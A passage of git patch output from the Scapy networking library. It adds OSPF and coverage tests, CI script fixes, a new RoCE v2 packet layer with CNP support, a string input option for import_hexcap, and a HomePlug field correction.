I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80\x00\t\x00\x04\x00\x00\x00\x00\x92\xe6\xb6:' + +p = Ether(data) + +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].age == 1) +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].type == 10) +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].id == '1.0.0.0') +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].adrouter == '17.3.3.3') +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].seq == 0x8000001f) +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].chksum == 0xabd9) +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].len == 132) +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].opaqueid() == 0) +assert (p[OSPF_LSUpd][OSPF_Area_Scope_Opaque_LSA].opaquetype() == 1) + +opaque_data=b'\x00\x01\x00\x04\x11\x03\x03\x03\x00\x02\x00d\x00\x01\x00\x01\x02\x00\x00\x00\x00\x02\x00\x04\xd2\x00\x00\x02\x00\x03\x00\x04\xd2\x00\x00\x01\x00\x04\x00\x04\xd2\x00\x00\x02\x00\x05\x00\x04\x00\x00\x03\xe8\x00\x06\x00\x04I\x98\x96\x80\x00\x07\x00\x04I\x98\x96\x80\x00\x08\x00 I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80I\x18\x96\x80\x00\t\x00\x04\x00\x00\x00\x00' + +p = OSPF_Link_Scope_Opaque_LSA(seq=0x80000003,data=opaque_data) +assert (p.type == 9) +assert (p.seq == 0x80000003) +assert (len(p) == 132) + +p = OSPF_Area_Scope_Opaque_LSA(seq=0x80000004,data=opaque_data) +assert (p.type == 10) +assert (p.seq == 0x80000004) +assert (len(p) == 132) + +p = OSPF_AS_Scope_Opaque_LSA(seq=0x80000005,data=opaque_data) +assert (p.type == 11) +assert (p.seq == 0x80000005) +assert (len(p) == 132) From 7fc1c09a34c93587afd6a699ecdde7d0f3277b8f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 3 Apr 2020 16:34:23 +0000 Subject: [PATCH 0067/1632] Exit on failure in install.sh --- .config/ci/install.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index e8d470e9458..7b6a5b8ea24 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -13,14 +13,14 @@ fi if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] then sudo apt-get update - sudo apt-get -qy install tshark net-tools - sudo apt-get -qy install can-utils build-essential linux-headers-$(uname -r) linux-modules-extra-$(uname -r); + sudo apt-get -qy install tshark net-tools || exit 1 + sudo apt-get -qy install can-utils build-essential linux-headers-$(uname -r) linux-modules-extra-$(uname -r) || exit 1 fi # Make sure libpcap is installed if [ ! -z $SCAPY_USE_PCAPDNET ] then - $SCAPY_SUDO apt-get -qy install libpcap-dev + $SCAPY_SUDO apt-get -qy install libpcap-dev || exit 1 fi # On Travis, "osx" dependencies are installed in .travis.yml From e870a4b1d5f42b094707233b1e92c642a3699268 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 3 Apr 2020 12:47:53 +0000 Subject: [PATCH 0068/1632] Stabilize coverage --- .config/ci/install.sh | 2 +- test/contrib/isotpscan.uts | 25 +++++++++++++++++++++++++ test/linux.uts | 8 ++++++++ test/pipetool.uts | 17 +++++++++-------- test/regression.uts | 38 ++++++++++++++++++++++++++++++++++++-- test/tls.uts | 10 +++++++++- 6 files changed, 88 insertions(+), 12 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 7b6a5b8ea24..e28bbc0908d 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -20,7 +20,7 @@ fi # Make sure libpcap is installed if [ ! -z $SCAPY_USE_PCAPDNET ] then - $SCAPY_SUDO apt-get -qy install libpcap-dev || exit 1 + sudo apt-get -qy install libpcap-dev || exit 1 fi # On Travis, "osx" dependencies are installed in .travis.yml diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 1badb172d78..90f50b5d93c 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -790,3 +790,28 @@ if 0 != call(["sudo", "ip", "link", "delete", iface0]): if 0 != call(["sudo", "ip", "link", "delete", iface1]): raise Exception("%s could not be deleted" % iface1) + ++ Coverage stability tests + += empty tests + +from scapy.contrib.isotp import generate_code_output, generate_text_output + +assert generate_code_output("", None) == "" +assert generate_text_output("") == "No packets found." + += get_isotp_fc + +from scapy.contrib.isotp import get_isotp_fc + +# to trigger "noise_ids.append(packet.identifier)" +a = [] +get_isotp_fc( + 1, [], a, False, + Bunch( + flags="extended", + identifier=1, + data=b"\x00" + ) +) +assert 1 in a diff --git a/test/linux.uts b/test/linux.uts index a62a996f924..36d28f42f46 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -76,6 +76,14 @@ from mock import patch with patch('scapy.consts.LOOPBACK_NAME', 'scapy_lo_x'): routes = read_routes() += catch get_working_if only loopback +~ linux + +from mock import patch + +with patch('scapy.arch.linux.get_if_list', side_effect=lambda: [LOOPBACK_NAME]): + assert get_working_if() == LOOPBACK_NAME + = catch loopback device no address assigned ~ linux needs_root diff --git a/test/pipetool.uts b/test/pipetool.uts index 0acb71b7bb9..b0382f736d9 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -323,10 +323,10 @@ with mock.patch("subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p.add(src > sink) p.start() src.send(pkt) - time.sleep(3) + src.close() # Prevent stop from closing the BytesIO with mock.patch.object(f, 'close'): - p.stop() + p.wait_and_stop() popen.assert_called_once_with( [conf.prog.wireshark, '-ki', '-'], stdin=subprocess.PIPE, stdout=None, @@ -348,10 +348,10 @@ with mock.patch("subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p.add(src > sink) p.start() src.send(pkt) - time.sleep(3) + src.close() # Prevent stop from closing the BytesIO with mock.patch.object(f, 'close'): - p.stop() + p.wait_and_stop() popen.assert_called_once_with( [conf.prog.wireshark, '-ki', '-'], @@ -378,10 +378,10 @@ with mock.patch("subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p.add(src > sink) p.start() src.send(pkt) - time.sleep(3) + src.close() # Prevent stop from closing the BytesIO with mock.patch.object(f, 'close'): - p.stop() + p.wait_and_stop() popen.assert_called_once_with( [conf.prog.wireshark, '-ki', '-', '-c', '1'], @@ -696,7 +696,7 @@ assert c.q.get(timeout=1) == "hello" p = PipeEngine() s = CLIFeeder() -d1 = TCPConnectPipe(addr="www.secdev.org", port=80) +d1 = TCPConnectPipe(addr="www.google.com", port=80) c = QueueSink() s > d1 > c @@ -704,7 +704,8 @@ s > d1 > c p.add(s) p.start() -s.send(b"GET / HTTP/1.1\nHost: www.secdev.org\n\n") +from scapy.layers.http import HTTPRequest, HTTP +s.send(bytes(HTTPRequest(Host="www.google.com"))) result = c.q.get(timeout=10) p.stop() diff --git a/test/regression.uts b/test/regression.uts index 0659d3fd50f..ade8269bab5 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -276,6 +276,10 @@ assert gzip_decompress(gziped_data) == monty_data data = b"sweet celestia" assert gzip_decompress(gzip_compress(data)) == data += orb/chb + +assert orb(b"\x01"[0]) == 1 +assert chb(1) == b"\x01" ############ ############ @@ -473,6 +477,13 @@ assert GTPHeader.__module__ == "scapy.contrib.gtp_v2" load_contrib("gtp") assert GTPHeader.__module__ == "scapy.contrib.gtp" += Test load_contrib failure +try: + load_contrib("doesnotexist") + assert False +except: + pass + = Test sane function sane("A\x00\xFFB") == "A..B" @@ -676,6 +687,9 @@ assert(ret == (">>> IP().src\n'127.0.0.1'\n", ret = autorun_get_latex_interactive_session("IP().src") assert(ret == ("\\textcolor{blue}{{\\tt\\char62}{\\tt\\char62}{\\tt\\char62} }IP().src\n'127.0.0.1'\n", '127.0.0.1')) +ret = autorun_get_text_interactive_session("scapy_undefined") +assert "NameError" in ret[0] + = Test utility TEX functions assert tex_escape("{scapy}\\^$~#_&%|><") == "{\\tt\\char123}scapy{\\tt\\char125}{\\tt\\char92}\\^{}\\${\\tt\\char126}\\#\\_\\&\\%{\\tt\\char124}{\\tt\\char62}{\\tt\\char60}" @@ -701,6 +715,11 @@ _read_config_file(fname, globals(), locals()) assert(conf.verb == 42) conf.verb = saved_conf_verb += Test config file functions failures + +from scapy.main import _probe_config_file +assert _probe_config_file("filethatdoesnotexistnorwillever.tsppajfsrdrr") is None + = Test CacheInstance repr conf.netcache @@ -3077,7 +3096,8 @@ a.type == 133 and a.code == 0 and a.cksum == 0 and a.res == 0 = ICMPv6ND_RS - Basic instantiation with empty dst in IPv6 underlayer a=IPv6(b'`\x00\x00\x00\x00\x08:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x85\x00M\xfe\x00\x00\x00\x00') -isinstance(a, IPv6) and a.nh == 58 and a.hlim == 255 and isinstance(a.payload, ICMPv6ND_RS) and a.payload.type == 133 and a.payload.code == 0 and a.payload.cksum == 0x4dfe and a.payload.res == 0 +assert isinstance(a, IPv6) and a.nh == 58 and a.hlim == 255 and isinstance(a.payload, ICMPv6ND_RS) and a.payload.type == 133 and a.payload.code == 0 and a.payload.cksum == 0x4dfe and a.payload.res == 0 +assert a.hashret() == b":" ############ @@ -3123,7 +3143,8 @@ a.code==0 and a.res==0 and a.tgt=="::" = ICMPv6ND_NS - Dissection with specific values a=ICMPv6ND_NS(b'\x87\x11\x00\x00\xe0\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -a.code==0x11 and a.res==3758096385 and a.tgt=="ffff::1111" +assert a.code==0x11 and a.res==3758096385 and a.tgt=="ffff::1111" +assert a.hashret() == b"ffff::1111" = ICMPv6ND_NS - IPv6 layer fields overloading a=IPv6(raw(IPv6()/ICMPv6ND_NS())) @@ -4128,6 +4149,10 @@ a.nh == 59 and a.res1 == 0 and a.offset == 0 and a.res2 == 0 and a.m == 0 and a. a=IPv6ExtHdrFragment(b'\xff\xee\xff\xfb\x11\x11\x11\x11') a.nh == 0xff and a.res1 == 0xee and a.offset==0x1fff and a.res2==1 and a.m == 1 and a.id == 0x11111111 += IPv6 - IPv6ExtHdrFragment hashret +a=IPv6()/IPv6ExtHdrFragment(b'\xff\xee\xff\xfb\x11\x11\x11\x11') +a.hashret() == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff' + ############ ############ @@ -4248,6 +4273,7 @@ answer.answers(query) == True # Test _ICMPv6Error from scapy.layers.inet6 import _ICMPv6Error assert _ICMPv6Error().guess_payload_class(None) == IPerror6 +assert _ICMPv6Error().hashret() == b'' = Windows: reset routes properly @@ -12126,6 +12152,14 @@ else: assert(ret) += BER trigger failures + +try: + BERcodec_INTEGER.do_dec(b"\x02\x01") + assert False +except BER_Decoding_Error: + pass + ############ ############ + inet.py diff --git a/test/tls.uts b/test/tls.uts index a6dd8f19696..54070a8eb27 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1003,8 +1003,14 @@ assert isinstance(TLS(b"\x00"), Raw) = Reading TLS msg dissect - Wrong data from scapy.layers.tls.record import _TLSMsgListField -assert isinstance(_TLSMsgListField.m2i(_TLSMsgListField("", []), TLS(type=0), '\x00\x03\x03\x00\x03abc'), Raw) +# Unknown type +assert isinstance(_TLSMsgListField.m2i(_TLSMsgListField("", []), TLS(type=0), b'\x00\x03\x03\x00\x03abc'), Raw) +old_debug_dissector = conf.debug_dissector +conf.debug_dissector = False +# not even bytes to make it crash +assert isinstance(_TLSMsgListField.m2i(_TLSMsgListField("", []), TLS(type=20), 1), Raw) +conf.debug_dissector = old_debug_dissector ############################################################################### ####### Read handshake with TLS_ECDHE_ECDSA_WITH_NULL_SHA ##################### @@ -1309,6 +1315,8 @@ test_tls_tools() = Dissect TLSCertificateVerify +from scapy.layers.tls.handshake import TLSCertificateVerify + t = TLS(b'\x16\x03\x03\x00P\x0f\x00\x00L\x04\x03\x00H0F\x02!\x00\xcf\xf1\xd0:1\xb8\xe4JCU\x00\x8c\xcdg\xf9=g\x84\xa3h;V@\xfd\xd1\\\xf0\xc4f\xfa\x18\xdc\x02!\x00\x82\x1dF\xc1\xd1\xab\x86\xaa\xb9"\x0eA\xf2\xc3Rj\xd7\xf1\xe9\xaf\x9b\xa5?R\n\xca\x15\xfe)\xa9j\x84') assert TLSCertificateVerify in t assert t[TLSCertificateVerify].sig.sig_len == 72 From 597e3cd92ac11166e724ad5e9e6bfa832a276cab Mon Sep 17 00:00:00 2001 From: Haggai Eran Date: Sun, 8 Mar 2020 17:03:42 +0200 Subject: [PATCH 0069/1632] Initial support for RoCE packets --- scapy/contrib/roce.py | 183 ++++++++++++++++++++++++++++++++++++++++++ test/contrib/roce.uts | 34 ++++++++ 2 files changed, 217 insertions(+) create mode 100644 scapy/contrib/roce.py create mode 100644 test/contrib/roce.uts diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py new file mode 100644 index 00000000000..899cab0f74e --- /dev/null +++ b/scapy/contrib/roce.py @@ -0,0 +1,183 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Haggai Eran +# This program is published under a GPLv2 license + +# scapy.contrib.description = RoCE v2 +# scapy.contrib.status = loads + +""" +RoCE: RDMA over Converged Ethernet +""" + +from scapy.packet import Packet, bind_layers, Raw +from scapy.fields import ByteEnumField, XByteField, XShortField, \ + BitField, FCSField +from scapy.layers.inet import IP, UDP +from scapy.compat import raw +from scapy.error import warning +from zlib import crc32 +import struct + +_transports = { + 'RC': 0x00, + 'UC': 0x20, + 'RD': 0x40, + 'UD': 0x60, +} + +_ops = { + 'SEND_FIRST': 0x00, + 'SEND_MIDDLE': 0x01, + 'SEND_LAST': 0x02, + 'SEND_LAST_WITH_IMMEDIATE': 0x03, + 'SEND_ONLY': 0x04, + 'SEND_ONLY_WITH_IMMEDIATE': 0x05, + 'RDMA_WRITE_FIRST': 0x06, + 'RDMA_WRITE_MIDDLE': 0x07, + 'RDMA_WRITE_LAST': 0x08, + 'RDMA_WRITE_LAST_WITH_IMMEDIATE': 0x09, + 'RDMA_WRITE_ONLY': 0x0a, + 'RDMA_WRITE_ONLY_WITH_IMMEDIATE': 0x0b, + 'RDMA_READ_REQUEST': 0x0c, + 'RDMA_READ_RESPONSE_FIRST': 0x0d, + 'RDMA_READ_RESPONSE_MIDDLE': 0x0e, + 'RDMA_READ_RESPONSE_LAST': 0x0f, + 'RDMA_READ_RESPONSE_ONLY': 0x10, + 'ACKNOWLEDGE': 0x11, + 'ATOMIC_ACKNOWLEDGE': 0x12, + 'COMPARE_SWAP': 0x13, + 'FETCH_ADD': 0x14, +} + + +def opcode(transport, op): + return (_transports[transport] + _ops[op], '{}_{}'.format(transport, op)) + + +_bth_opcodes = dict([ + opcode('RC', 'SEND_FIRST'), + opcode('RC', 'SEND_MIDDLE'), + opcode('RC', 'SEND_LAST'), + opcode('RC', 'SEND_LAST_WITH_IMMEDIATE'), + opcode('RC', 'SEND_ONLY'), + opcode('RC', 'SEND_ONLY_WITH_IMMEDIATE'), + opcode('RC', 'RDMA_WRITE_FIRST'), + opcode('RC', 'RDMA_WRITE_MIDDLE'), + opcode('RC', 'RDMA_WRITE_LAST'), + opcode('RC', 'RDMA_WRITE_LAST_WITH_IMMEDIATE'), + opcode('RC', 'RDMA_WRITE_ONLY'), + opcode('RC', 'RDMA_WRITE_ONLY_WITH_IMMEDIATE'), + opcode('RC', 'RDMA_READ_REQUEST'), + opcode('RC', 'RDMA_READ_RESPONSE_FIRST'), + opcode('RC', 'RDMA_READ_RESPONSE_MIDDLE'), + opcode('RC', 'RDMA_READ_RESPONSE_LAST'), + opcode('RC', 'RDMA_READ_RESPONSE_ONLY'), + opcode('RC', 'ACKNOWLEDGE'), + opcode('RC', 'ATOMIC_ACKNOWLEDGE'), + opcode('RC', 'COMPARE_SWAP'), + opcode('RC', 'FETCH_ADD'), + + opcode('UC', 'SEND_FIRST'), + opcode('UC', 'SEND_MIDDLE'), + opcode('UC', 'SEND_LAST'), + opcode('UC', 'SEND_LAST_WITH_IMMEDIATE'), + opcode('UC', 'SEND_ONLY'), + opcode('UC', 'SEND_ONLY_WITH_IMMEDIATE'), + opcode('UC', 'RDMA_WRITE_FIRST'), + opcode('UC', 'RDMA_WRITE_MIDDLE'), + opcode('UC', 'RDMA_WRITE_LAST'), + opcode('UC', 'RDMA_WRITE_LAST_WITH_IMMEDIATE'), + opcode('UC', 'RDMA_WRITE_ONLY'), + opcode('UC', 'RDMA_WRITE_ONLY_WITH_IMMEDIATE'), + + opcode('RD', 'SEND_FIRST'), + opcode('RD', 'SEND_MIDDLE'), + opcode('RD', 'SEND_LAST'), + opcode('RD', 'SEND_LAST_WITH_IMMEDIATE'), + opcode('RD', 'SEND_ONLY'), + opcode('RD', 'SEND_ONLY_WITH_IMMEDIATE'), + opcode('RD', 'RDMA_WRITE_FIRST'), + opcode('RD', 'RDMA_WRITE_MIDDLE'), + opcode('RD', 'RDMA_WRITE_LAST'), + opcode('RD', 'RDMA_WRITE_LAST_WITH_IMMEDIATE'), + opcode('RD', 'RDMA_WRITE_ONLY'), + opcode('RD', 'RDMA_WRITE_ONLY_WITH_IMMEDIATE'), + opcode('RD', 'RDMA_READ_REQUEST'), + opcode('RD', 'RDMA_READ_RESPONSE_FIRST'), + opcode('RD', 'RDMA_READ_RESPONSE_MIDDLE'), + opcode('RD', 'RDMA_READ_RESPONSE_LAST'), + opcode('RD', 'RDMA_READ_RESPONSE_ONLY'), + opcode('RD', 'ACKNOWLEDGE'), + opcode('RD', 'ATOMIC_ACKNOWLEDGE'), + opcode('RD', 'COMPARE_SWAP'), + opcode('RD', 'FETCH_ADD'), + + opcode('UD', 'SEND_ONLY'), + opcode('UD', 'SEND_ONLY_WITH_IMMEDIATE'), + + (0x81, 'CNP'), +]) + + +class BTH(Packet): + name = "BTH" + fields_desc = [ + ByteEnumField("opcode", 0, _bth_opcodes), + BitField("solicited", 0, 1), + BitField("migreq", 0, 1), + BitField("padcount", 0, 2), + BitField("version", 0, 4), + XShortField("pkey", 0xffff), + XByteField("resv8", 0), + BitField("dqpn", 0, 24), + BitField("ackreq", 0, 1), + BitField("resv7", 0, 7), + BitField("psn", 0, 24), + + FCSField("icrc", None, fmt="!I")] + + @staticmethod + def pack_icrc(icrc): + return struct.pack("!I", icrc & 0xffffffff)[::-1] + + def compute_icrc(self, p): + udp = self.underlayer + if udp is None or not isinstance(udp, UDP): + warning("Expecting UDP underlayer to compute checksum. Got %s.", + udp and udp.name) + return self.pack_icrc(0) + ip = udp.underlayer + if isinstance(ip, IP): + # pseudo-LRH / IP / UDP / BTH / payload + pshdr = Raw(b'\xff' * 8) / ip.copy() + pshdr.chksum = 0xffff + pshdr.ttl = 0xff + pshdr.tos = 0xff + pshdr[UDP].chksum = 0xffff + pshdr[BTH].resv8 = 0xff + bth = pshdr[BTH].self_build() + payload = raw(pshdr[BTH].payload) + # add ICRC placeholder just to get the right IP.totlen and + # UDP.length + icrc_placeholder = b'\xff\xff\xff\xff' + pshdr[UDP].payload = Raw(bth + payload + icrc_placeholder) + icrc = crc32(raw(pshdr)[:-4]) & 0xffffffff + return self.pack_icrc(icrc) + else: + # TODO support IPv6 + warning("The underlayer protocol %s is not supported.", + ip and ip.name) + return self.pack_icrc(0) + + # RoCE packets end with ICRC - a 32-bit CRC of the packet payload and + # pseudo-header. Add the ICRC header if it is missing and calculate its + # value. + def post_build(self, p, pay): + p += pay + if self.icrc is None: + p = p[:-4] + self.compute_icrc(p) + return p + + +bind_layers(UDP, BTH, dport=4791) diff --git a/test/contrib/roce.uts b/test/contrib/roce.uts new file mode 100644 index 00000000000..9c7a9beb2b8 --- /dev/null +++ b/test/contrib/roce.uts @@ -0,0 +1,34 @@ +# RoCE unit tests +# run with: +# test/run_tests -P "load_contrib('roce')" -t test/contrib/roce.uts -F + +% Regression tests for the RoCE layer + +################ +##### RoCE ##### +################ + ++ RoCE tests + += RoCE layer + +# an example UC packet +pkt = Ether(dst='24:8a:07:a8:fa:22', src='24:8a:07:a8:fa:22')/ \ + IP(version=4, ihl=5, tos=0x1, id=1144, flags='DF', frag=0, \ + ttl=64, src='192.168.0.7', dst='192.168.0.7', len=64)/ \ + UDP(sport=49152, dport=4791, len=44)/ \ + BTH(opcode='UC_SEND_ONLY', migreq=1, padcount=2, pkey=0xffff, dqpn=211, psn=13571856)/ \ + Raw(b'F0\x81\x8b\xe2\x895\xd9\x0e\x9a\x95PT\x01\xbe\x88^P\x00\x00') + +# include ICRC placeholder +pkt = Ether(pkt.build() + b'\x00' * 4) + +assert IP in pkt.layers() +print(hex(pkt[IP].chksum)) +assert pkt[IP].chksum == 0xb4d5 +assert UDP in pkt.layers() +print(hex(pkt[UDP].chksum)) +assert pkt[UDP].chksum == 0xaca2 +assert BTH in pkt.layers() +assert pkt[BTH].icrc == 0x78f353f3 + From 90de5b77d4edd50641478875d01e41431aad2ea1 Mon Sep 17 00:00:00 2001 From: Haggai Eran Date: Fri, 13 Mar 2020 10:11:05 +0200 Subject: [PATCH 0070/1632] Add string parameter to import_hexcap Allow reading a hex dump from a string. --- scapy/utils.py | 11 +++++++++-- test/regression.uts | 12 ++++++++++++ 2 files changed, 21 insertions(+), 2 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 606c46e3d69..3149e005934 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1538,16 +1538,23 @@ def _write_packet(self, packet, sec=None, usec=None, caplen=None, @conf.commands.register -def import_hexcap(): +def import_hexcap(input_string=None): """Imports a tcpdump like hexadecimal view e.g: exported via hexdump() or tcpdump or wireshark's "export as hex" + + :param input_string: String containing the hexdump input to parse. If None, + read from standard input. """ re_extract_hexcap = re.compile(r"^((0x)?[0-9a-fA-F]{2,}[ :\t]{,3}|) *(([0-9a-fA-F]{2} {,2}){,16})") # noqa: E501 p = "" try: + if input_string: + input_function = six.StringIO(input_string).readline + else: + input_function = input while True: - line = input().strip() + line = input_function().strip() if not line: break try: diff --git a/test/regression.uts b/test/regression.uts index ade8269bab5..2f5fdb7b4d0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12735,6 +12735,18 @@ assert pkt[Ether].dst == "ff:ff:ff:ff:ff:ff" assert pkt[IP].dst == "127.0.0.1" assert ICMP in pkt += import_hexcap(input_string) +data = """ +0000 FF FF FF FF FF FF AA AA AA AA AA AA 08 00 45 00 ..............E. +0010 00 1C 00 01 00 00 40 01 7C DE 7F 00 00 01 7F 00 ......@.|....... +0020 00 01 08 00 F7 FF 00 00 00 00 .......... +"""[1:] +pkt = import_hexcap(data) +pkt = Ether(pkt) +assert pkt[Ether].dst == "ff:ff:ff:ff:ff:ff" +assert pkt[IP].dst == "127.0.0.1" +assert ICMP in pkt + = padding() def test_padding(): From ab0784df71436ef2a6a5700f3026843597c57b2f Mon Sep 17 00:00:00 2001 From: Haggai Eran Date: Tue, 10 Mar 2020 21:57:01 +0200 Subject: [PATCH 0071/1632] Add RoCE CNP packet format Add sub-headers for congestion notification packets. --- scapy/contrib/roce.py | 31 ++++++++++++++++++++++++----- test/contrib/roce.uts | 45 +++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 71 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py index 899cab0f74e..01fcf709154 100644 --- a/scapy/contrib/roce.py +++ b/scapy/contrib/roce.py @@ -11,8 +11,8 @@ """ from scapy.packet import Packet, bind_layers, Raw -from scapy.fields import ByteEnumField, XByteField, XShortField, \ - BitField, FCSField +from scapy.fields import ByteEnumField, XShortField, \ + XLongField, BitField, FCSField from scapy.layers.inet import IP, UDP from scapy.compat import raw from scapy.error import warning @@ -51,6 +51,9 @@ } +CNP_OPCODE = 0x81 + + def opcode(transport, op): return (_transports[transport] + _ops[op], '{}_{}'.format(transport, op)) @@ -116,7 +119,7 @@ def opcode(transport, op): opcode('UD', 'SEND_ONLY'), opcode('UD', 'SEND_ONLY_WITH_IMMEDIATE'), - (0x81, 'CNP'), + (CNP_OPCODE, 'CNP'), ]) @@ -129,7 +132,9 @@ class BTH(Packet): BitField("padcount", 0, 2), BitField("version", 0, 4), XShortField("pkey", 0xffff), - XByteField("resv8", 0), + BitField("fecn", 0, 1), + BitField("becn", 0, 1), + BitField("resv6", 0, 6), BitField("dqpn", 0, 24), BitField("ackreq", 0, 1), BitField("resv7", 0, 7), @@ -155,7 +160,9 @@ def compute_icrc(self, p): pshdr.ttl = 0xff pshdr.tos = 0xff pshdr[UDP].chksum = 0xffff - pshdr[BTH].resv8 = 0xff + pshdr[BTH].fecn = 1 + pshdr[BTH].becn = 1 + pshdr[BTH].resv6 = 0xff bth = pshdr[BTH].self_build() payload = raw(pshdr[BTH].payload) # add ICRC placeholder just to get the right IP.totlen and @@ -180,4 +187,18 @@ def post_build(self, p, pay): return p +class CNPPadding(Packet): + name = "CNPPadding" + fields_desc = [ + XLongField("reserved1", 0), + XLongField("reserved2", 0), + ] + + +def cnp(dqpn): + return BTH(opcode=CNP_OPCODE, becn=1, dqpn=dqpn) / CNPPadding() + + +bind_layers(BTH, CNPPadding, opcode=CNP_OPCODE) + bind_layers(UDP, BTH, dport=4791) diff --git a/test/contrib/roce.uts b/test/contrib/roce.uts index 9c7a9beb2b8..3275d8db206 100644 --- a/test/contrib/roce.uts +++ b/test/contrib/roce.uts @@ -32,3 +32,48 @@ assert pkt[UDP].chksum == 0xaca2 assert BTH in pkt.layers() assert pkt[BTH].icrc == 0x78f353f3 += RoCE CNP packet + +# based on this example packet: +# https://community.mellanox.com/s/article/rocev2-cnp-packet-format-example + +pkt = Ether()/IP(src='22.22.22.8', dst='22.22.22.7', id=0x98c6, flags='DF', + ttl=0x20, tos=0x89)/ \ + UDP(sport=56238, dport=4791, chksum=0)/ \ + cnp(dqpn=0xd2) +pkt = Ether(pkt.build()) + +assert pkt[IP].len == 60 +assert pkt[UDP].len == 40 +assert pkt[BTH].opcode == 0x81 +assert pkt[BTH].becn +assert not pkt[BTH].fecn +assert pkt[BTH].resv6 == 0 +assert pkt[BTH].resv7 == 0 +assert pkt[BTH].dqpn == 0xd2 +assert pkt[BTH].version == 0 +assert not pkt[BTH].solicited +assert not pkt[BTH].migreq +assert pkt[BTH].padcount == 0 +assert pkt[BTH].pkey == 0xffff +assert not pkt[BTH].ackreq +assert pkt[BTH].psn == 0 +assert pkt[CNPPadding].reserved1 == 0 +assert pkt[CNPPadding].reserved2 == 0 +# assert pkt[BTH].icrc == 0xe42dad81 TODO - does not match example + += RoCE CNP captured on ConnectX-4 Lx + +pkt = Ether(import_hexcap('''0x0000: e41d 2dab 2bc2 7cfe 9064 3b32 0800 45c2 +0x0010: 003c 718c 4000 4011 9161 0a00 1101 0a00 +0x0020: 1201 0000 12b7 0028 0000 8100 ffff 4000 +0x0030: 0118 0000 0000 0000 0000 0000 0000 0000 +0x0040: 0000 0000 0000 82fd 002a +''')) + +assert BTH in pkt.layers() +assert pkt.opcode == CNP_OPCODE +del pkt.icrc +pkt = Ether(pkt.build()) +assert pkt.icrc == 0x82fd002a + From 8cefb5a3c6fc63457122283cfb02108948bd9ff7 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sun, 5 Apr 2020 12:23:52 +0200 Subject: [PATCH 0072/1632] Hotfix: remove run_tests tests see https://github.com/secdev/scapy/issues/2554 --- .config/ci/test.sh | 9 --------- 1 file changed, 9 deletions(-) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index e59ad741955..01f06ddd0f6 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -69,12 +69,3 @@ echo TOXENV=$TOXENV # Launch Scapy unit tests tox -- ${UT_FLAGS} || exit 1 - -# Start Scapy in interactive mode -TEMPFILE=$(mktemp) -cat << EOF > "${TEMPFILE}" -print("Scapy on %s" % sys.version) -sys.exit() -EOF -./run_scapy -H -c "${TEMPFILE}" || exit 1 -rm ${TEMPFILE} From 497e24508ed4ffd634a18b249a5367d18dd7cc12 Mon Sep 17 00:00:00 2001 From: Jesse Kerkhoven Date: Mon, 6 Apr 2020 10:10:15 +0200 Subject: [PATCH 0073/1632] Fix CM_SLAC_MATCH_CNF second RSVD The CM_SLAC_MATCH_CNF second RSVD has 1 byte, replaced ShortField (2 bytes) with ByteField --- scapy/contrib/homepluggp.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/homepluggp.py b/scapy/contrib/homepluggp.py index b7c5d35b8b3..ac7ba97c9e8 100644 --- a/scapy/contrib/homepluggp.py +++ b/scapy/contrib/homepluggp.py @@ -158,7 +158,7 @@ class SLAC_varfield_cnf(Packet): StrFixedLenField("RunID", b"\x00" * 8, 8), StrFixedLenField("RSVD", b"\x00" * 8, 8), StrFixedLenField("NetworkID", b"\x00" * 7, 7), - ShortField("Reserved", 0), + ByteField("Reserved", 0x0), StrFixedLenField("NMK", b"\x00" * 16, 16)] From 01f2436832081937c84da11868d311e7f9daabc9 Mon Sep 17 00:00:00 2001 From: Ivan Shvedunov Date: Mon, 23 Dec 2019 10:48:57 +0300 